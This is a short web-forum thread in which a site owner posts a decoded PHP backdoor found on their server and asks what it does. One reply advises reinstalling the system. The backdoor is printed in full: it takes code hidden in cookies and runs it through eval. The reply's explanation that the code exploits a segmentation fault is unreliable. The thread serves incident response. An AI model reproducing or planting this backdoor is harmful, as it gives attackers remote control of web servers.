SitePoint Sponsor

User Tag List

Results 1 to 3 of 3

Thread: Malicious Codes

  1. #1
    SitePoint Zealot darksystem's Avatar
    Join Date
    Jan 2005
    Location
    Fayettville, North Carolina
    Posts
    184
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Malicious Codes : Please help

    Hi,

    I found an encoded file from our website and when I decoded it, I got this code

    Code:
    $c='count';$a=$_COOKIE;if(reset($a)=='th' && $c($a)>3){$k='3Password55';echo '<'.$k.'>';eval(base64_decode(preg_replace(array('/[^\w=\s]/','/\s/'), array('','+'), join(array_slice($a,$c($a)-3)))));echo '';}
    in more human readable manner code

    Code:
    $c='count';
    $a=$_COOKIE;
    if(reset($a)=='th' && $c($a)>3)
    {
    	$k='3Password55';echo '<'.$k.'>';
    	eval(base64_decode(preg_replace(array('/[^\w=\s]/','/\s/'), array('','+'), join(array_slice($a,$c($a)-3)))));
    	echo '';
    }
    Can somebody tell me what it is?
    I know the fact that it destroying our website but not sure the detailed information about it.

    I would appreciate if somebody could explain the code above.

    Experts, please share your knowledge for us to protect our website and what to do to prevent it.

    Kind regards
    Ebay API, OSC/CRE/OscMax/ZenCart/SEO Services
    Lucki Multimedia - Email

  2. #2
    I solve practical problems. bronze trophy
    Michael Morris's Avatar
    Join Date
    Jan 2008
    Location
    Knoxville TN
    Posts
    2,027
    Mentioned
    65 Post(s)
    Tagged
    0 Thread(s)
    You've been rooted. The code above exploits a segmentation fault in the PHP interpreter to create a backdoor into the system. A google search against the first line of the code reveals that much. More specifics on the exact exploit used will require a more exhaustive search.

    The best procedure when dealing with a rootkit is to nuke it from orbit - that is get your data off the machine then reinstall the OS from scratch and make sure you are running the most current version of the branch of PHP you are using this time.

  3. #3
    SitePoint Zealot darksystem's Avatar
    Join Date
    Jan 2005
    Location
    Fayettville, North Carolina
    Posts
    184
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    thanks michael.

    i have now fully aware of the codes of what it does and how to prevent this hacking from happening.
    after a careful research to prevent it, our website now is fully safe i guess. atleast for now.

    anyway, thanks for your inputs and i really appreciate it.
    Ebay API, OSC/CRE/OscMax/ZenCart/SEO Services
    Lucki Multimedia - Email


Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •